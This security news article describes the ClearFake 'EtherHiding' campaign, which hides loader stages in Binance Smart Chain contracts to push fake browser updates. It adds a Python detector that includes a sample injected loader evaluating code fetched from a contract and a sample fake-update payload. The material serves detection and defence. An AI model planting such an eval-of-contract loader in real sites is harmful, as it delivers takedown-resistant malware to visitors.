Etherhiding Blockchain Technique Masks Malicious Code in WordPress Sites

Published: 23/11/2024   Category: security




The ClearFake campaign uses fake browser updates to lure victims and spread RedLine, Amadey, and Lumma stealers.



A threat actor has been abusing a public blockchain (Binance Smart Chain) to hide malicious code in a campaign that uses fake browser updates to spread various malware, including the infostealers RedLine, Amadey, and Lumma.
While abuse of blockchain is typically seen in attacks aimed at stealing cryptocurrency, as the technology is best known for securing those transactions, EtherHiding demonstrates how attackers can leverage it for other kinds of malicious activity.
Researchers from Guardio have been tracking a campaign dubbed ClearFake over the last two months, in which users are misled into downloading fake browser updates from at least 30 hijacked WordPress sites.
The campaign uses a technique called EtherHiding, which puts a novel twist on serving malicious code: parts of the malicious code chain are hosted in Binance Smart Chain (BSC) smart contracts. Binance is one of the world's largest cryptocurrency exchanges, and Guardio calls the approach "the next level of Bullet-Proof Hosting" in a recent post.
BSC is owned by Binance and is built around smart contracts: coded agreements that execute actions automatically when certain conditions are met, Guardio explained in the post. These contracts offer new ways to build applications and processes. Because the blockchain is publicly readable and its history cannot be altered, code stored on-chain cannot be taken down. Note that this immutability applies to the chain's history and to deployed contract code; the data a contract stores can still be changed by its owner through new transactions, which is exactly what lets an operator rotate what the contract hands out.
Attackers are leveraging this by hosting and serving malicious code in a manner that cannot be taken down at the hosting layer, which makes the activity difficult to stop. The campaign is "up and harder than ever to detect and take down," according to the post.
Attackers turned to this tactic when their initial method, hosting code on abused Cloudflare Workers, was taken down, the researchers noted. They've quickly pivoted to take advantage of the decentralized, anonymous, and public nature of the blockchain, according to the post.
The attack begins with concealed JavaScript injected into the pages of compromised WordPress sites. That loader retrieves a second-stage payload from attacker-controlled infrastructure, with the BSC contract supplying part of the chain. From there, the attackers deface the site with a very believable overlay demanding a browser update before the page can be accessed, according to Guardio.
Using this method, the attacker can remotely and instantly modify the infection process and display any message they want, according to the post. By changing what the contract returns, the operator can change tactics, update blocked domains, and swap out detected payloads without touching the WordPress sites again.
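The loader-and-contract round trip described above, as an added example that is not part of the original article or of Guardio's research code. It does two things: it flags page source that wires a BNB Smart Chain RPC endpoint and a contract read into eval() (the kind of check a site owner can run over rendered pages or theme files when monitoring for injections), and it decodes the ABI-encoded string that an eth_call to such a contract returns, which is how the loader obtains its next stage. The page HTML, the contract address and the RPC response are constructed samples; the RPC hostnames are the public BSC endpoints, and the eval-of-.call() shape of the loader is a simplification assumed for illustration.

```python
"""
EtherHiding loader check (added example, not Guardio's code).
  1. scan_page()/is_suspicious(): flag page HTML that feeds a web3 contract
     read on a BNB Smart Chain public RPC endpoint into eval().
  2. abi_decode_string()/decode_stage(): decode the ABI-encoded string an
     eth_call returns, i.e. the next-stage script the loader receives.
All HTML, the contract address and the RPC response are constructed samples.
"""
import json
import re

# Constructed sample of a page with an injected loader.  The 0x... address is a
# placeholder, not a real contract, and the loader body is a simplification.
INJECTED_PAGE = """<html><head><title>Blog</title>
<script src="https://cdn.example/web3.min.js"></script>
<script>
(async()=>{const w=new Web3("https://bsc-dataseed.binance.org/");
const c=new w.eth.Contract(ABI,"0x0123456789abcdef0123456789abcdef01234567");
eval(await c.methods.get().call());})();
</script></head><body><p>Hello</p></body></html>"""

# Constructed sample of an untouched page.
CLEAN_PAGE = """<html><head><title>Blog</title>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
</head><body><p>Hello</p></body></html>"""

INDICATORS = {
    # public BSC JSON-RPC endpoints (bsc-dataseed*.binance.org / .bnbchain.org)
    "bsc_rpc_endpoint": re.compile(
        r"https?://bsc-dataseed\d*\.(?:binance|bnbchain)\.org", re.I),
    # a web3.js / ethers provider being constructed in page script
    "web3_library": re.compile(
        r"\bnew\s+Web3\s*\(|\bethers\.(?:providers|JsonRpcProvider|Contract)\b"),
    # a contract object, or a raw eth_call, in page script
    "contract_call": re.compile(r"\.eth\.Contract\s*\(|\beth_call\b"),
    # the result of a contract read passed straight into eval()
    "eval_of_call": re.compile(r"\beval\s*\(\s*await\s+.*?\.call\s*\("),
}


def scan_page(html: str) -> list[str]:
    """Return the names of the indicators present in the page source."""
    return [name for name, rx in INDICATORS.items() if rx.search(html)]


def is_suspicious(html: str) -> bool:
    """A WordPress page has no business talking to a chain RPC endpoint from
    inline script: an RPC endpoint plus a contract read, or eval() of a
    contract read, is treated as an EtherHiding-style loader."""
    hits = set(scan_page(html))
    return "eval_of_call" in hits or (
        "bsc_rpc_endpoint" in hits and bool(hits & {"contract_call", "web3_library"}))


def abi_encode_string(s: str) -> str:
    """ABI-encode one dynamic `string` return value: 32-byte offset (0x20),
    32-byte length, then the UTF-8 bytes padded to a 32-byte boundary.
    Used here only to construct the sample eth_call response."""
    data = s.encode("utf-8")
    pad = b"\x00" * ((32 - len(data) % 32) % 32)
    return ("0x" + (32).to_bytes(32, "big").hex()
            + len(data).to_bytes(32, "big").hex() + (data + pad).hex())


def abi_decode_string(result_hex: str) -> str:
    """Inverse of the above: the string the loader's .call() hands to eval()."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    return raw[offset + 32:offset + 32 + length].decode("utf-8", errors="replace")


# Constructed sample of what the chain would return to the injected loader.
SAMPLE_PAYLOAD = ('document.body.innerHTML="<h1>Your browser is out of date</h1>'
                  '<a href=\'https://update.example/Update.exe\'>Update now</a>";')
SAMPLE_RPC_RESPONSE = json.dumps(
    {"jsonrpc": "2.0", "id": 1, "result": abi_encode_string(SAMPLE_PAYLOAD)})


def decode_stage(rpc_response_json: str) -> str:
    """Decode the `result` of a JSON-RPC eth_call response into script text."""
    return abi_decode_string(json.loads(rpc_response_json)["result"])


def looks_like_script(payload: str) -> bool:
    """Cheap triage: does the decoded string look like code/markup, not data?"""
    return any(t in payload for t in ("eval(", "document.", "<script", "http://", "https://"))


if __name__ == "__main__":
    print("injected:", scan_page(INJECTED_PAGE), is_suspicious(INJECTED_PAGE))
    print("clean:", scan_page(CLEAN_PAGE), is_suspicious(CLEAN_PAGE))
    stage = decode_stage(SAMPLE_RPC_RESPONSE)
    print("decoded stage looks like script:", looks_like_script(stage))
    print(stage)
```

The indicator set is deliberately narrow: a 40-hex-digit address on its own is far too common to be a signal, so the check keys on the RPC hostname and on a contract read being executed, which is the part of the loader the operator cannot move off-chain without giving up the takedown resistance the technique exists for. The decoder is the same logic a proxy or endpoint sensor needs to inspect what an eth_call actually returned.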
While blockchain and other Web 3.0 technologies bring innovation, they are also ripe for abuse by threat actors, who continuously adapt to exploit their properties for nefarious activity.
Beyond this specific campaign, blockchain can be misused in myriad ways, from malware propagation stages to exfiltration of stolen credentials and files, all eluding traditional law-enforcement shutdown methods, according to Guardio.
One simple way to block the ClearFake attack would be for Binance to refuse queries to addresses already tagged as malicious, or to disable the eth_call method (the read-only JSON-RPC call that executes a contract function without sending a transaction) for unvalidated contracts, according to the post. The researchers did not say whether they had contacted Binance about this potential fix. The caveat is that eth_call is the ordinary read path for every legitimate dApp and that public BSC RPC endpoints are run by more than one provider, so a block at one provider only bites while the loader hard-codes that provider's endpoint.
Securing WordPress sites, which are prone to vulnerabilities and thus ripe for exploitation, would also close the gateway that lets threats like this reach a broad victim base, according to Guardio.
To this end, the researchers recommend keeping WordPress core and plugins updated, safeguarding credentials, using strong, periodically changed passwords, and generally keeping a close eye on what's happening on sites in order to detect malicious activity.




